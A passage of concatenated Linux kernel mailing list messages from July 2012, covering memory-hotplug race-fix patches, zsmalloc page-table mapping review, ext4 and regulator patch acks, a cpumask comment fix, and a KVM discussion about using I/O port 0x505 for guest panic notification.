@@ -1301,7 +1304,7 @@ void free_hot_cold_page(struct page *page, int cold)
return;
 
migratetype = get_pageblock_migratetype(page);
-   set_page_private(page, migratetype);
+   set_page_migratetype(page, migratetype);
local_irq_save(flags);
if (unlikely(wasMlocked))
free_page_mlock(page);
diff --git a/mm/page_isolation.c b/mm/page_isolation.c
index 64abb33..acf65a7 100644
--- a/mm/page_isolation.c
+++ b/mm/page_isolation.c
@@ -199,7 +199,7 @@ __test_page_isolated_in_pageblock(unsigned long pfn, 
unsigned long end_pfn)
if (PageBuddy(page))
pfn += 1 << page_order(page);
else if (page_count(page) == 0 &&
-   page_private(page) == MIGRATE_ISOLATE)
+   get_page_migratetype(page) == MIGRATE_ISOLATE)
pfn += 1;
else
break;
-- 
1.7.9.5

--
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Please read the FAQ at  http://www.tux.org/lkml/


[RESEND RFC 2/3] mm: remain migratetype in freed page

2012-07-22 Thread Minchan Kim
Page allocator doesn't keep migratetype information to page
when the page is freed. This patch remains the information
to freed page's index field which isn't used by free/alloc
preparing so it shouldn't change any behavir except below one.

This patch adds a new call site in __free_pages_ok so it might be
overhead a bit but it's for high order allocation.
So I believe damage isn't hurt.

Signed-off-by: Minchan Kim 
---
 include/linux/mm.h |6 --
 mm/page_alloc.c|7 ---
 2 files changed, 8 insertions(+), 5 deletions(-)

diff --git a/include/linux/mm.h b/include/linux/mm.h
index 86d61d6..8fd32da 100644
--- a/include/linux/mm.h
+++ b/include/linux/mm.h
@@ -251,12 +251,14 @@ struct inode;
 
 static inline void set_page_migratetype(struct page *page, int migratetype)
 {
-   set_page_private(page, migratetype);
+   VM_BUG_ON((unsigned int)migratetype >= MIGRATE_TYPES);
+   page->index = migratetype;
 }
 
 static inline int get_page_migratetype(struct page *page)
 {
-   return page_private(page);
+   VM_BUG_ON((unsigned int)page->index >= MIGRATE_TYPES);
+   return page->index;
 }
 
 /*
diff --git a/mm/page_alloc.c b/mm/page_alloc.c
index 103ba66..32985dd 100644
--- a/mm/page_alloc.c
+++ b/mm/page_alloc.c
@@ -723,6 +723,7 @@ static void __free_pages_ok(struct page *page, unsigned int 
order)
 {
unsigned long flags;
int wasMlocked = __TestClearPageMlocked(page);
+   int migratetype;
 
if (!free_pages_prepare(page, order))
return;
@@ -731,9 +732,9 @@ static void __free_pages_ok(struct page *page, unsigned int 
order)
if (unlikely(wasMlocked))
free_page_mlock(page);
__count_vm_events(PGFREE, 1 << order);
-   free_one_page(page_zone(page), page, order,
-   get_pageblock_migratetype(page));
-
+   migratetype = get_pageblock_migratetype(page);
+   set_page_migratetype(page, migratetype);
+   free_one_page(page_zone(page), page, order, migratetype);
local_irq_restore(flags);
 }
 
-- 
1.7.9.5

--
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Please read the FAQ at  http://www.tux.org/lkml/


[RESEND RFC 3/3] memory-hotplug: bug fix race between isolation and allocation

2012-07-22 Thread Minchan Kim
Like below, memory-hotplug makes race between page-isolation
and page-allocation so it can hit BUG_ON in __offline_isolated_pages.

CPU A   CPU B

start_isolate_page_range
set_migratetype_isolate
spin_lock_irqsave(zone->lock)

free_hot_cold_page(Page A)
/* without zone->lock */
migratetype = get_pageblock_migratetype(Page A);
/*
 * Page could be moved into MIGRATE_MOVABLE
 * of per_cpu_pages
 */
list_add_tail(&page->lru, 
&pcp->lists[migratetype]);

set_pageblock_isolate
move_freepages_block
drain_all_pages

/* Page A could be in MIGRATE_MOVABLE of 
free_list. */

check_pages_isolated
__test_page_isolated_in_pageblock
/*
 * We can't catch freed page which
 * is free_list[MIGRATE_MOVABLE]
 */
if (PageBuddy(page A))
pfn += 1 << page_order(page A);

/* So, Page A could be allocated */

__offline_isolated_pages
/*
 * BUG_ON hit or offline page
 * which is used by someone
 */
BUG_ON(!PageBuddy(page A));

Signed-off-by: Minchan Kim 
---
I found this problem during code review so please confirm it.
Kame?

 mm/page_isolation.c |5 -
 1 file changed, 4 insertions(+), 1 deletion(-)

diff --git a/mm/page_isolation.c b/mm/page_isolation.c
index acf65a7..4699d1f 100644
--- a/mm/page_isolation.c
+++ b/mm/page_isolation.c
@@ -196,8 +196,11 @@ __test_page_isolated_in_pageblock(unsigned long pfn, 
unsigned long end_pfn)
continue;
}
page = pfn_to_page(pfn);
-   if (PageBuddy(page))
+   if (PageBuddy(page)) {
+   if (get_page_migratetype(page) != MIGRATE_ISOLATE)
+   break;
pfn += 1 << page_order(page);
+   }
else if (page_count(page) == 0 &&
get_page_migratetype(page) == MIGRATE_ISOLATE)
pfn += 1;
-- 
1.7.9.5

--
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Please read the FAQ at  http://www.tux.org/lkml/


[RESEND RFC 0/3] memory-hotplug: handle page race between allocation and isolation

2012-07-22 Thread Minchan Kim
Memory hotplug has a subtle race problem so this patchset fixes the problem
(Look at [3/3] for detail and please confirm the problem before review
other patches in this series.)

 [1/3] is just clean up and help for [2/3].
 [2/3] keeps the migratetype information to freed page's index field
   and [3/3] uses the information.
 [3/3] fixes the race problem with [2/3]'s information.

After applying [2/3], migratetype argument in __free_one_page
and free_one_page is redundant so we can remove it but I decide
to not touch them because it increases code size about 50 byte.

Minchan Kim (3):
  mm: use get_page_migratetype instead of page_private
  mm: remain migratetype in freed page
  memory-hotplug: bug fix race between isolation and allocation

 include/linux/mm.h  |   12 
 mm/page_alloc.c |   16 ++--
 mm/page_isolation.c |7 +--
 3 files changed, 27 insertions(+), 8 deletions(-)

-- 
1.7.9.5

--
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Please read the FAQ at  http://www.tux.org/lkml/


Re: [PATCH 3/3] zsmalloc: add page table mapping method

2012-07-22 Thread Minchan Kim
Hi Seth,

On Sun, Jul 22, 2012 at 07:33:40PM -0500, Seth Jennings wrote:
> On 07/22/2012 07:26 PM, Minchan Kim wrote:
> > On Wed, Jul 18, 2012 at 11:55:56AM -0500, Seth Jennings wrote:
> >> This patchset provides page mapping via the page table.
> >> On some archs, most notably ARM, this method has been
> >> demonstrated to be faster than copying.
> >>
> >> The logic controlling the method selection (copy vs page table)
> >> is controlled by the definition of USE_PGTABLE_MAPPING which
> >> is/can be defined for any arch that performs better with page
> >> table mapping.
> >>
> >> Signed-off-by: Seth Jennings 
> >> ---
> >>  drivers/staging/zsmalloc/zsmalloc-main.c |  182 
> >> ++
> >>  drivers/staging/zsmalloc/zsmalloc_int.h  |6 -
> >>  2 files changed, 134 insertions(+), 54 deletions(-)
> >>
> >> diff --git a/drivers/staging/zsmalloc/zsmalloc-main.c 
> >> b/drivers/staging/zsmalloc/zsmalloc-main.c
> >> index b86133f..defe350 100644
> >> --- a/drivers/staging/zsmalloc/zsmalloc-main.c
> >> +++ b/drivers/staging/zsmalloc/zsmalloc-main.c
> >> @@ -89,6 +89,30 @@
> >>  #define CLASS_IDX_MASK((1 << CLASS_IDX_BITS) - 1)
> >>  #define FULLNESS_MASK ((1 << FULLNESS_BITS) - 1)
> >>  
> >> +/*
> >> + * By default, zsmalloc uses a copy-based object mapping method to access
> >> + * allocations that span two pages. However, if a particular architecture
> >> + * 1) Implements local_flush_tlb_kernel_range() and 2) Performs VM mapping
> >> + * faster than copying, then it should be added here so that
> > 
> > How about adding your benchmark url?
> > 
> >> + * USE_PGTABLE_MAPPING is defined. This causes zsmalloc to use page table
> >> + * mapping rather than copying
> >> + * for object mapping.
> > 
> > unnecessary new line.
> 
> Since these aren't functional issues with the code, if I
> _promise_ to send a follow-up patch to address these, can I
> get your Ack?

Sure!

Thanks for your effort!

-- 
Kind regards,
Minchan Kim
--
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Please read the FAQ at  http://www.tux.org/lkml/


RE: [PATCH] regulator: Use BUCK_FPWM_[MASK|SHIFT] macros to replace buck_pmap table

2012-07-22 Thread Kim, Milo
> This patch defines BUCK_FPWM_MASK and BUCK_FPWM_SHIFT macros to replace
> buck_pmap mapping table.
> 
> Signed-off-by: Axel Lin 

Acked-by: Milo(Woogyom) Kim 
Tested-by: Milo(Woogyom) Kim 

Thanks !

Best Regards,
Milo


RE: [PATCH] regulator: lp8788-ldo: Set n_voltages to 1 for fixed voltage

2012-07-22 Thread Kim, Milo
> For fixed voltage, the n_voltages should be 1 rather than 0.
> 
> Signed-off-by: Axel Lin 

Acked-by: Milo(Woogyom) Kim 

Thanks !

Best Regards,
Milo


Re: [PATCH v3] ext4: fix hole punch failure when depth is greater than 0

2012-07-22 Thread Theodore Ts'o
On Tue, Jul 10, 2012 at 09:56:10PM +0530, Ashish Sangwan wrote:
> Whether to continue removing extents or not is decided by the return value
> of function ext4_ext_more_to_rm() which checks 2 conditions:
> a) if there are no more indexes to process.
> b) if the number of entries are decreased in the header of "depth -1".
> 
> In case of hole punch, if the last block to be removed is not part of the
> last extent index than this index will not be deleted, hence the number of
> valid entries in the extent header of "depth - 1" will remain as it is and
> ext4_ext_more_to_rm will return 0 although the required blocks are not
> yet removed.
> 
> This patch fixes the above mentioned problem as instead of removing the
> extents from the end of file, it starts removing the blocks from the
> particular extent from which removing blocks is actually required and
> continue backward until done.
> 
> Signed-off-by: Ashish Sangwan 
> Signed-off-by: Namjae Jeon 
> Reviewed-by: Lukas Czerner 

Applied, with a cc: to sta...@kernel.org since it is a bug fix.

Thanks for submitting this patch!

  - Ted
--
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Please read the FAQ at  http://www.tux.org/lkml/


Re: [PATCH 3/3] zsmalloc: add page table mapping method

2012-07-22 Thread Seth Jennings
On 07/22/2012 07:26 PM, Minchan Kim wrote:
> On Wed, Jul 18, 2012 at 11:55:56AM -0500, Seth Jennings wrote:
>> This patchset provides page mapping via the page table.
>> On some archs, most notably ARM, this method has been
>> demonstrated to be faster than copying.
>>
>> The logic controlling the method selection (copy vs page table)
>> is controlled by the definition of USE_PGTABLE_MAPPING which
>> is/can be defined for any arch that performs better with page
>> table mapping.
>>
>> Signed-off-by: Seth Jennings 
>> ---
>>  drivers/staging/zsmalloc/zsmalloc-main.c |  182 
>> ++
>>  drivers/staging/zsmalloc/zsmalloc_int.h  |6 -
>>  2 files changed, 134 insertions(+), 54 deletions(-)
>>
>> diff --git a/drivers/staging/zsmalloc/zsmalloc-main.c 
>> b/drivers/staging/zsmalloc/zsmalloc-main.c
>> index b86133f..defe350 100644
>> --- a/drivers/staging/zsmalloc/zsmalloc-main.c
>> +++ b/drivers/staging/zsmalloc/zsmalloc-main.c
>> @@ -89,6 +89,30 @@
>>  #define CLASS_IDX_MASK  ((1 << CLASS_IDX_BITS) - 1)
>>  #define FULLNESS_MASK   ((1 << FULLNESS_BITS) - 1)
>>  
>> +/*
>> + * By default, zsmalloc uses a copy-based object mapping method to access
>> + * allocations that span two pages. However, if a particular architecture
>> + * 1) Implements local_flush_tlb_kernel_range() and 2) Performs VM mapping
>> + * faster than copying, then it should be added here so that
> 
> How about adding your benchmark url?
> 
>> + * USE_PGTABLE_MAPPING is defined. This causes zsmalloc to use page table
>> + * mapping rather than copying
>> + * for object mapping.
> 
> unnecessary new line.

Since these aren't functional issues with the code, if I
_promise_ to send a follow-up patch to address these, can I
get your Ack?

--
Seth

--
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Please read the FAQ at  http://www.tux.org/lkml/


Re: [PATCH 3/3] zsmalloc: add page table mapping method

2012-07-22 Thread Minchan Kim
On Wed, Jul 18, 2012 at 11:55:56AM -0500, Seth Jennings wrote:
> This patchset provides page mapping via the page table.
> On some archs, most notably ARM, this method has been
> demonstrated to be faster than copying.
> 
> The logic controlling the method selection (copy vs page table)
> is controlled by the definition of USE_PGTABLE_MAPPING which
> is/can be defined for any arch that performs better with page
> table mapping.
> 
> Signed-off-by: Seth Jennings 
> ---
>  drivers/staging/zsmalloc/zsmalloc-main.c |  182 
> ++
>  drivers/staging/zsmalloc/zsmalloc_int.h  |6 -
>  2 files changed, 134 insertions(+), 54 deletions(-)
> 
> diff --git a/drivers/staging/zsmalloc/zsmalloc-main.c 
> b/drivers/staging/zsmalloc/zsmalloc-main.c
> index b86133f..defe350 100644
> --- a/drivers/staging/zsmalloc/zsmalloc-main.c
> +++ b/drivers/staging/zsmalloc/zsmalloc-main.c
> @@ -89,6 +89,30 @@
>  #define CLASS_IDX_MASK   ((1 << CLASS_IDX_BITS) - 1)
>  #define FULLNESS_MASK((1 << FULLNESS_BITS) - 1)
>  
> +/*
> + * By default, zsmalloc uses a copy-based object mapping method to access
> + * allocations that span two pages. However, if a particular architecture
> + * 1) Implements local_flush_tlb_kernel_range() and 2) Performs VM mapping
> + * faster than copying, then it should be added here so that

How about adding your benchmark url?

> + * USE_PGTABLE_MAPPING is defined. This causes zsmalloc to use page table
> + * mapping rather than copying
> + * for object mapping.

unnecessary new line.

> +*/
> +#if defined(CONFIG_ARM)
> +#define USE_PGTABLE_MAPPING
> +#endif

I had no better idea and I would like to add zsmalloc into mainline.
So no objection.
Nitin?

> +
> +struct mapping_area {
> +#ifdef USE_PGTABLE_MAPPING
> + struct vm_struct *vm; /* vm area for mapping object that span pages */
> +#else
> + char *vm_buf; /* copy buffer for objects that span pages */
> +#endif
> + char *vm_addr; /* address of kmap_atomic()'ed pages */
> + enum zs_mapmode vm_mm; /* mapping mode */
> +};
> +
> +
>  /* per-cpu VM mapping areas for zspage accesses that cross page boundaries */
>  static DEFINE_PER_CPU(struct mapping_area, zs_map_area);
>  
> @@ -471,16 +495,83 @@ static struct page *find_get_zspage(struct size_class 
> *class)
>   return page;
>  }
>  
> -static void zs_copy_map_object(char *buf, struct page *page,
> - int off, int size)
> +#ifdef USE_PGTABLE_MAPPING
> +static inline int __zs_cpu_up(struct mapping_area *area)
> +{
> + /*
> +  * Make sure we don't leak memory if a cpu UP notification
> +  * and zs_init() race and both call zs_cpu_up() on the same cpu
> +  */
> + if (area->vm)
> + return 0;
> + area->vm = alloc_vm_area(PAGE_SIZE * 2, NULL);
> + if (!area->vm)
> + return -ENOMEM;
> + return 0;
> +}
> +
> +static inline void __zs_cpu_down(struct mapping_area *area)
> +{
> + if (area->vm)
> + free_vm_area(area->vm);
> + area->vm = NULL;
> +}
> +
> +static inline void *__zs_map_object(struct mapping_area *area,
> + struct page *pages[2], int off, int size)
> +{
> + BUG_ON(map_vm_area(area->vm, PAGE_KERNEL, &pages));
> + area->vm_addr = area->vm->addr;
> + return area->vm_addr + off;
> +}
> +
> +static inline void __zs_unmap_object(struct mapping_area *area,
> + struct page *pages[2], int off, int size)
> +{
> + unsigned long addr = (unsigned long)area->vm_addr;
> + unsigned long end = addr + (PAGE_SIZE * 2);
> +
> + flush_cache_vunmap(addr, end);
> + unmap_kernel_range_noflush(addr, PAGE_SIZE * 2);
> + local_flush_tlb_kernel_range(addr, end);
> +}
> +
> +#else /* USE_PGTABLE_MAPPING */
> +
> +static inline int __zs_cpu_up(struct mapping_area *area)
> +{
> + /*
> +  * Make sure we don't leak memory if a cpu UP notification
> +  * and zs_init() race and both call zs_cpu_up() on the same cpu
> +  */
> + if (area->vm_buf)
> + return 0;
> + area->vm_buf = (char *)__get_free_page(GFP_KERNEL);
> + if (!area->vm_buf)
> + return -ENOMEM;
> + return 0;
> +}
> +
> +static inline void __zs_cpu_down(struct mapping_area *area)
> +{
> + if (area->vm_buf)
> + free_page((unsigned long)area->vm_buf);
> + area->vm_buf = NULL;
> +}
> +
> +static void *__zs_map_object(struct mapping_area *area,
> + struct page *pages[2], int off, int size)
>  {
> - struct page *pages[2];
>   int sizes[2];
>   void *addr;
> + char *buf = area->vm_buf;
>  
> - pages[0] = page;
> - pages[1] = get_next_page(page);
> - BUG_ON(!pages[1]);
> + /* disable page faults to match kmap_atomic() return conditions */
> + pagefault_disable();
> +
> + /* no read fastpath */
> + if (area->vm_mm == ZS_MM_WO)
> + goto out;
>  
>   sizes[0] = PAGE_SIZE - off;
>   sizes[

Re: [patch -next] ext4: locking issue on error path

2012-07-22 Thread Theodore Ts'o
On Tue, Jul 17, 2012 at 04:13:51PM +0800, Zheng Liu wrote:
> On Tue, Jul 17, 2012 at 09:31:06AM +0300, Dan Carpenter wrote:
> > We recently changed how the locking worked here, but this error path was
> > missed.
> > 
> > Signed-off-by: Dan Carpenter 
> 
> Sorry, it is my fault.  Thanks for pointing out this bug.

Since this patch hadn't been promoted past the master branch pointer
(it was only in the dev branch, which can be rebased), I've merged
this fix up with Zheng's original patch.

Dan, may thanks for finding and pointing it out!!

- Ted
--
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Please read the FAQ at  http://www.tux.org/lkml/


Re: [PATCH 2/3] zsmalloc: prevent mappping in interrupt context

2012-07-22 Thread Minchan Kim
On Wed, Jul 18, 2012 at 11:55:55AM -0500, Seth Jennings wrote:
> Because we use per-cpu mapping areas shared among the
> pools/users, we can't allow mapping in interrupt context
> because it can corrupt another users mappings.
> 
> Signed-off-by: Seth Jennings 
Acked-by: Minchan Kim 

-- 
Kind regards,
Minchan Kim
--
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Please read the FAQ at  http://www.tux.org/lkml/


Re: [PATCH 1/3] zsmalloc: s/firstpage/page in new copy map funcs

2012-07-22 Thread Minchan Kim
On Wed, Jul 18, 2012 at 11:55:54AM -0500, Seth Jennings wrote:
> firstpage already has precedent and meaning the first page
> of a zspage.  In the case of the copy mapping functions,
> it is the first of a pair of pages needing to be mapped.
> 
> This patch just renames the firstpage argument to "page" to
> avoid confusion.
> 
> Signed-off-by: Seth Jennings 
Acked-by: Minchan Kim 

-- 
Kind regards,
Minchan Kim
--
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Please read the FAQ at  http://www.tux.org/lkml/


Re: [PATCHv7 0/5] ext4: stop using write_supers and s_dirt

2012-07-22 Thread Theodore Ts'o
On Wed, Jul 11, 2012 at 04:46:39PM +0300, Artem Bityutskiy wrote:
> This patch-set makes ext4 file-system stop using the VFS '->write_supers()'
> call-back and the '->s_dirt' superblock field because I plan to remove them
> once all users are gone.

I've applied this patch series, thanks.

- Ted
--
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Please read the FAQ at  http://www.tux.org/lkml/


Re: [Qemu-devel] [PATCH v7.5] kvm: notify host when the guest is panicked

2012-07-22 Thread Sasha Levin
On 07/23/2012 12:36 AM, Anthony Liguori wrote:
> Sasha Levin  writes:
> 
>> On 07/22/2012 09:14 PM, Anthony Liguori wrote:
>>> Sasha Levin  writes:
>>>
 On 07/21/2012 10:44 AM, Wen Congyang wrote:
> We can know the guest is panicked when the guest runs on xen.
> But we do not have such feature on kvm.
>
> Another purpose of this feature is: management app(for example:
> libvirt) can do auto dump when the guest is panicked. If management
> app does not do auto dump, the guest's user can do dump by hand if
> he sees the guest is panicked.
>
> We have three solutions to implement this feature:
> 1. use vmcall
> 2. use I/O port
> 3. use virtio-serial.
>
> We have decided to avoid touching hypervisor. The reason why I choose
> choose the I/O port is:
> 1. it is easier to implememt
> 2. it does not depend any virtual device
> 3. it can work when starting the kernel

 Was the option of implementing a virtio-watchdog driver considered?

 You're basically re-implementing a watchdog, a guest-host interface and a 
 set of protocols for guest-host communications.

 Why can't we re-use everything we have now, push a virtio watchdog
 driver into drivers/watchdog/, and gain a more complete solution to
 detecting hangs inside the guest.
>>>
>>> The purpose of virtio is not to reinvent every possible type of device.
>>> There are plenty of hardware watchdogs that are very suitable to be used
>>> for this purpose.  QEMU implements quite a few already.
>>>
>>> Watchdogs are not performance sensitive so there's no point in using
>>> virtio.
>>
>> The issue here is not performance, but the adding of a brand new
>> guest-host interface.
> 
> We have:
> 
> 1) Virtio--this is our preferred PV interface.  It needs PCI to be fully
> initialized and probably will live as a module.
> 
> 2) Hypercalls--this a secondary PV interface but is available very
> early.  It's terminated in kvm.ko which means it can only operate on
> things that are logically part of the CPU and/or APIC complex.
> 
> This patch introduces a third interface which is available early like
> hypercalls but not necessarily terminated in kvm.ko.  That means it can
> have a broader scope in functionality than (2).
> 
> We could just as well use a hypercall and have multiple commands issued
> to that hypercall as a convention and add a new exit type to KVM that
> sent that specific hypercall to userspace for processing.
> 
> But a PIO operation already has this behavior and requires no changes to 
> kvm.ko.

I don't dispute that there may be a need for another guest-host interface, but 
this patch can basically be called "kvm: notify host when the guest is 
panicked, oh, btw, and add a brand new undocumented interface"

The new interface should at least come in it's own patch, with documentation.
--
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Please read the FAQ at  http://www.tux.org/lkml/


Re: [Qemu-devel] [PATCH v7] kvm: notify host when the guest is panicked

2012-07-22 Thread Sasha Levin
On 07/23/2012 12:29 AM, Anthony Liguori wrote:
> Sasha Levin  writes:
> 
>> On 07/22/2012 10:19 PM, Sasha Levin wrote:
>>> On 07/22/2012 09:22 PM, Anthony Liguori wrote:
 Sasha Levin  writes:

> On 07/21/2012 09:12 AM, Wen Congyang wrote:
>> +#define KVM_PV_PORT (0x505UL)
>> +
>>  #ifdef __KERNEL__
>>  #include 
>>  
>> @@ -221,6 +223,11 @@ static inline void kvm_disable_steal_time(void)
>>  }
>>  #endif
>>  
>> +static inline unsigned int kvm_arch_pv_features(void)
>> +{
>> +return inl(KVM_PV_PORT);
>> +}
>> +
>
> Why is this safe?
>
> I'm not sure you can just pick any ioport you'd like and use it.

 There are three ways I/O ports get used on a PC:

 1) Platform devices
  - This is well defined since the vast majority of platform devices are
implemented within a single chip.  If you're emulating an i440fx
chipset, the PIIX4 spec has an exhaustive list.

 2) PCI devices
  - Typically, PCI only allocates ports starting at 0x0d00 to avoid
conflicts with ISA devices.

 3) ISA devices
  - ISA uses subtractive decoding so any ISA device can access.  In
theory, an ISA device could attempt to use port 0x0505 but it's
unlikely.  In a modern guest, there aren't really any ISA devices being
added either.

 So yes, picking port 0x0505 is safe for something like this (as long as
 you check to make sure that you really are under KVM).
>>>
>>> Is there anything that actually prevents me from using PCI ports lower than 
>>> 0x0d00? As you said in (3), ISA isn't really used anymore (nor is 
>>> implemented by lkvm for example), so placing PCI below 0x0d00 might even 
>>> make sense in that case.
>>>
>>> Furthermore, I can place one of these brand new virtio-mmio devices which 
>>> got introduced recently wherever I want right now - Having a device that 
>>> uses 0x505 would cause a pretty non-obvious failure mode.
>>>
>>> Either way, If we are going to grab an ioport, then:
>>>
>>>  - It should be documented well somewhere in Documentation/virt/kvm
>>>  - It should go through request_region() to actually claim those ioports.
>>>  - It should fail gracefully if that port is taken for some reason, instead 
>>> of not even checking it.
>>>
>>
>> Out of curiosity I tested that, and apparently lkvm has no problem 
>> allocating virtio-pci devices in that range:
>>
>> sh-4.2# pwd
>> /sys/devices/pci:00/:00:01.0
>> sh-4.2# cat resource | head -n1
>> 0x0500 0x05ff 0x00040101
>>
>> This was with the commit in question applied.
> 
> With all due respect, lkvm has a half-baked implementation of PCI.  This
> is why you have to pass kernel parameters to disable ACPI and disable
> PCI BIOS probing.
> 
> So yeah, you can do funky things in lkvm but that doesn't mean a system
> that emulated actual hardware would ever do that.

We disable ACPI simply because we don't support it. MPtable is a perfectly 
valid mechanism to do everything we need so far, so implementing ACPI didn't 
interest either of us too much. What's more - why implement a "complete design 
disaster in every way" ;)

Regarding PCI probing, while we do force the use of direct memory probing this 
is because we lack anything which reassembles a BIOS. Like the above, this 
wasn't too interesting in a virtualized environment, and the kernel is pretty 
happy running without it. PCI probing does happen in a standard way.

I think that the interesting part in that test was not that you could actually 
put a PCI device in the 0x500 range, but that nothing failed and no one yelled 
at me (with the panic commit applied).

I'm not worried about port 0x505 being taken, I'm worried that it'll silently 
break a (although not very common/reasonable/typical) perfectly valid use case.
--
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Please read the FAQ at  http://www.tux.org/lkml/


Re: [PATCH] fix ext4 mismerge back in January

2012-07-22 Thread Theodore Ts'o
On Wed, Jul 18, 2012 at 09:31:36AM +0100, Al Viro wrote:
> Duplicate caused, AFAICS, by mismerge in 
> ff9cb1c4eead5e4c292e75cd3170a82d66944101>
> Cc: sta...@vger.kernel.org
> Signed-off-by: Al Viro 

Applied, thanks.

- Ted
--
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Please read the FAQ at  http://www.tux.org/lkml/


Re: [PATCH 00/34] Memory management performance backports for -stable

2012-07-22 Thread Ben Hutchings
I'm about to put 3.2.24 out for review, and it's pretty big already so
I'm going to defer these to 3.2.25.  I haven't forgotten or rejected
them.

Ben.

-- 
Ben Hutchings
73.46% of all statistics are made up.


signature.asc
Description: This is a digitally signed message part


Re: [PATCH 2/3] drivers/misc: Add realtek pci card reader driver

2012-07-22 Thread Rusty Russell
On Thu, 19 Jul 2012 17:55:10 +0800,  wrote:
> From: Wei WANG 
> 
> Realtek PCI-E card reader driver adapts requests from upper-level
> sdmmc/memstick layer to the real physical card reader.

> +static int msi_en = 1;
> +module_param(msi_en, int, S_IRUGO | S_IWUSR);
> +MODULE_PARM_DESC(msi_en, "Enable MSI");
> +
> +static int adma_mode = 1;
> +module_param(adma_mode, int, S_IRUGO | S_IWUSR);
> +MODULE_PARM_DESC(adma_mode, "ADMA Mode");

These seem like they should be bool?

Cheers,
Rusty.
--
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Please read the FAQ at  http://www.tux.org/lkml/


Re: [PATCH 2/2] cpumask: cpumask_scnprintf() comments correction

2012-07-22 Thread Rusty Russell
On Mon, 16 Jul 2012 16:29:24 +0800, Alex Shi  wrote:
> On 07/16/2012 03:40 PM, Rusty Russell wrote:
> 
> > On Mon, 16 Jul 2012 10:35:54 +0800, Alex Shi  wrote:
> >> The function has no parameter @len now, so need to remove it from
> >> comments to avoid kernel-doc warning:
> > 
> > But it still does in my tree.
> > 
> > Please push this patch via whoever changed it?
> > 
> > Acked-by: Rusty Russell 
> > 
> 
> Sorry, my fault, the commit log used a wrong function name, it is 
> cpulist_parse()
> not cpumask_scnprntf. and find a new error in the comments: used a incorrect 
> function name: cpulist_parse_user(), the correct one is cpulist_parse().
> Fix it in updated patch.
> 
> Both errors appear in Rusty's commit 29c0177e6a4.

OK, I put this last line in the commit message, see below.

Thanks!
Rusty.

From: Alex Shi 
Date: Mon, 16 Jul 2012 10:25:06 +0800
Subject: [PATCH] cpumask: cpulist_parse() comments correction

As introduced in Rusty's commit 29c0177e6a4, the function has no
parameter @len, so need to remove it from comments to avoid kernel-doc
warning:

alexs@debian:~/linux-next$ scripts/kernel-doc -man
include/linux/cpumask.h | split-man.pl /tmp/man

Warning(include/linux/cpumask.h:602): Excess function parameter 'len'
description in 'cpulist_parse'

and correct the function name in comments to cpulist_parse.

Signed-off-by: Alex Shi 
Signed-off-by: Rusty Russell 
---
 include/linux/cpumask.h |3 +--
 1 files changed, 1 insertions(+), 2 deletions(-)

diff --git a/include/linux/cpumask.h b/include/linux/cpumask.h
index 8bf1c27..0325602 100644
--- a/include/linux/cpumask.h
+++ b/include/linux/cpumask.h
@@ -591,9 +591,8 @@ static inline int cpulist_scnprintf(char *buf, int len,
 }
 
 /**
- * cpulist_parse_user - extract a cpumask from a user string of ranges
+ * cpulist_parse - extract a cpumask from a user string of ranges
  * @buf: the buffer to extract from
- * @len: the length of the buffer
  * @dstp: the cpumask to set.
  *
  * Returns -errno, or 0 for success.
--
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Please read the FAQ at  http://www.tux.org/lkml/


Re: [Qemu-devel] [PATCH v7.5] kvm: notify host when the guest is panicked

2012-07-22 Thread Anthony Liguori
Sasha Levin  writes:

> On 07/22/2012 09:14 PM, Anthony Liguori wrote:
>> Sasha Levin  writes:
>> 
>>> On 07/21/2012 10:44 AM, Wen Congyang wrote:
 We can know the guest is panicked when the guest runs on xen.
 But we do not have such feature on kvm.

 Another purpose of this feature is: management app(for example:
 libvirt) can do auto dump when the guest is panicked. If management
 app does not do auto dump, the guest's user can do dump by hand if
 he sees the guest is panicked.

 We have three solutions to implement this feature:
 1. use vmcall
 2. use I/O port
 3. use virtio-serial.

 We have decided to avoid touching hypervisor. The reason why I choose
 choose the I/O port is:
 1. it is easier to implememt
 2. it does not depend any virtual device
 3. it can work when starting the kernel
>>>
>>> Was the option of implementing a virtio-watchdog driver considered?
>>>
>>> You're basically re-implementing a watchdog, a guest-host interface and a 
>>> set of protocols for guest-host communications.
>>>
